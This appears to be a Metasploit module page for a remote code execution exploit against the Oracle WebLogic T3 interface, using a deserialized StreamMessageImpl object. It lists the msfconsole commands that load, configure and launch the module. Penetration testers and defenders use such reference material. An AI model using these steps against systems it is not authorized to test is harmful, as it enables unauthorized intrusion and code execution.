An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a serialized object (weblogic.jms.common.StreamMessageImpl) to the interface to execute code on vulnerable hosts.
Solaris,Unix,Windows
To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':
msf > use exploit/multi/misc/weblogic_deserialize_rawobject
msf exploit(weblogic_deserialize_rawobject) > show targets
...targets...
msf exploit(weblogic_deserialize_rawobject) > set TARGET < target-id >
msf exploit(weblogic_deserialize_rawobject) > show options
...show and set options...
msf exploit(weblogic_deserialize_rawobject) > exploit
Time is precious, so I don’t want to do something manually that I can automate. Leveraging the Metasploit Framework when automating any task keeps us from having to re-create the wheel as we can use the existing libraries and focus our efforts where it matters.
– Jim O’Gorman | President, Offensive Security